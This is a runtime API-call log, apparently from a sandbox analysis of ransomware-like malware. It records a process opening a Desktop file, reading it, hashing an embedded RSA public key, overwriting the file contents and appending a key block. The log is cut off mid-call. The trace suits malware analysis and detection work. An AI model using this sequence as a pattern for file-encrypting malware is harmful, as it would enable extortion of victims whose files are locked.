FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5aeadf0, ftCreationTime.dwHighDateTime=0x1d8a100, ftLastAccessTime.dwLowDateTime=0x4ce13070, ftLastAccessTime.dwHighDateTime=0x1d8a241, ftLastWriteTime.dwLowDateTime=0x4ce13070, ftLastWriteTime.dwHighDateTime=0x1d8a241, nFileSizeHigh=0x0, nFileSizeLow=0x12d51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C5Rx.mkv", cAlternateFileName="")) returned 1 [0183.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30688 [0183.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0183.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30688 | out: hHeap=0x6a0000) returned 1 [0183.455] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\C5Rx.mkv") returned=".mkv" [0183.455] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\C5Rx.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\c5rx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.456] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=77137) returned 1 [0183.456] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.458] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12d2b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.459] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.461] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.461] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x12d51, lpOverlapped=0x0) returned 1 [0183.463] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.463] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.463] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.463] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.464] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.464] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.464] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.464] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.464] GetLastError () returned 0x0 [0183.464] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.464] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.465] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.465] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.465] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12d50) returned 0x2d43778 [0183.465] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30688 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d90 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.466] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d36670 [0183.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d36890 [0183.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36890 | out: hHeap=0x6a0000) returned 1 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e738 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e6d8 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.469] GetCurrentThreadId () returned 0x264 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce260 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.469] GetCurrentThreadId () returned 0x264 [0183.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e738 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e798 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7b0 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e750 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6d8 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d36670 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d36880 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d36a98 [0183.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36880 | out: hHeap=0x6a0000) returned 1 [0183.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36a98 | out: hHeap=0x6a0000) returned 1 [0183.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30d90 | out: hHeap=0x6a0000) returned 1 [0183.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.481] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x12d4c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x12d4c, lpOverlapped=0x0) returned 1 [0183.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.482] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12d51, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.483] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.483] HeapFree 